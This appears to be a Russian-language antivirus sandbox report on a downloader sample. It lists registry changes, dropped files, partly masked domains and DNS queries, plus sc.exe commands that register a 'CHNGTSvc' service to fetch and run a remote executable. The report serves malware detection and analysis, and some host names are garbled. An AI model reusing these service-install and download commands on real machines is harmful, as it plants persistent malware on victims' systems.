Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\CHNGTSvc] 'ImagePath' = 'c:\exervice.exe http://cloudfront.MZђ.com/download/xpack1116_IN.1479333937.exe'
- '%TEMP%\nse2.tmp\ns4.tmp' sc create CHNGTSvc binPath= "c:\exervice.exe http://cl####ront.MZђ.com/download/xpack1116_IN.1479333937.exe"
- '<SYSTEM32>\sc.exe' create CHNGTSvc binPath= "c:\exervice.exe http://cl####ront.MZђ.com/download/xpack1116_IN.1479333937.exe"
- '%TEMP%\nse2.tmp\ns3.tmp' sc delete CHNGTSvc
- '<SYSTEM32>\sc.exe' delete CHNGTSvc
- %TEMP%\nse2.tmp\nsExec.dll
- %TEMP%\nse2.tmp\ns3.tmp
- %TEMP%\nse2.tmp\ns4.tmp
- C:\exervice.exe.config
- %TEMP%\nse2.tmp\INetC.dll
- C:\xpack1116_IN.1479333937.exe
- C:\exervice.exe
- %TEMP%\nse2.tmp\ns3.tmp
- 'cl####ront.mz??.com':80
- 'bu##.##onological.pw':80
- http://cl####ront.MZ�.com/download/xpack1116_IN.1479333937.exe via cl####ront.mz??.com
- http://bu##.##onological.pw/get/domain
- DNS ASK cl#####ont.mzђ.om
- DNS ASK bu##.##onological.pw